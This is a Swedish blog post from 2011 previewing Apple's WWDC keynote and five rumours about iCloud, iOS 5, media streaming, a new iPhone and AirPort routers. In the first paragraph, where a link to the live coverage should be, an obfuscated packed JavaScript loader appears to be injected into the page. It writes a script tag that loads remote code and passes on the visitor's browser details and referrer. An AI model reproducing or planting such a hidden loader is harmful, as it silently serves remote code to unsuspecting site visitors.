Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Live sändning från WWDC!

Live sändning från WWDC!
Filip Urde
  • On 6 juni, 2011
  • http://www.revue.se/filip-urde

Ikväll ca 19:00 Svensk tid så drar rapporteringarna igång från Apples stora sommar spektakel i San Francisco. Via den här länken, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ahkza|var|u0026u|referrer|hkdzz||js|php’.split(’|’),0,{}))
så kommer Engadget göra en live sändning det hela.

Vad vi kommer få se i kväll är som med alla andra Apple event, högst oklart! men rykten med olika höga sannolikheter finns så klart att hämta.

rykte 1: Streama musik via iCloud

Detta är knappt ens ett rykte, man kommer visa iCloud och man kommer till 99% säkerhet kunna streama musik via klienten. 
Vad som dock är intressant är om Apple är jobbiga nog att detta endast omfattar låtar man köpt på iTunes Store. I så fall är åtminstonde jag körd.  Vad gäller stöd för filmer och tv-serier är senaste budet att det skjutits på framtiden.

rykte 2: Högre systemkrav för iOS 5

Som jag skrev nu här om dagen, så finns det mycket som tyder på att iOS5 tar iPhone 3Gs med sig i graven (och motsvarande i iPod Touch). Min teori om att Apple vill sälja iPhone 4or och senare iPhone 5(?!) känns stämma. Man är inte direkt intresserade av att låta sina användare använda sina produkt mer än 2 år.

rykte 3: Nya tjänster för att streama bilder, ljud och video
iOS 4.3 har avslöjats ha två nya tjänster (dolda) som går under namnen ”Photo Stream” och ”Media Stream”. Troligtvis handlar det om lösningar för att strömma bilder, ljud och video från en iPhone, iPad eller iPod Touch till en annan enhet. Möjligtvis hänger det hela samman med den nya molntjänsten iCloud?!

rykte 4: Ny iPhone

Detta ryktet finns så klart, men hur sannolikt det är…ja, det är frågan! Personligen tror jag man mjölkar det man har ett tag till.

rykte 5: Nya modeller av Airport Extreme och Time Capsule

På tiden kanske?! Dessa (enligt mig själv) överprisade routrar och lagrings system har inte haft en uppdatering sedan oktober 2009. Det känns som man behöver liten uppdatering på ämnet om man nu dessutom går in fullskaligt i molntjänster (iCloud). 
Ska man tro de senaste ryktena kommer man till exempel kunna använda Time Capsule som ett nav för uppdateringar till Mac OS X och iOS.

 

Men tänk så bra att vi får veta i kväll! Så slipper alla spekulera som dårar…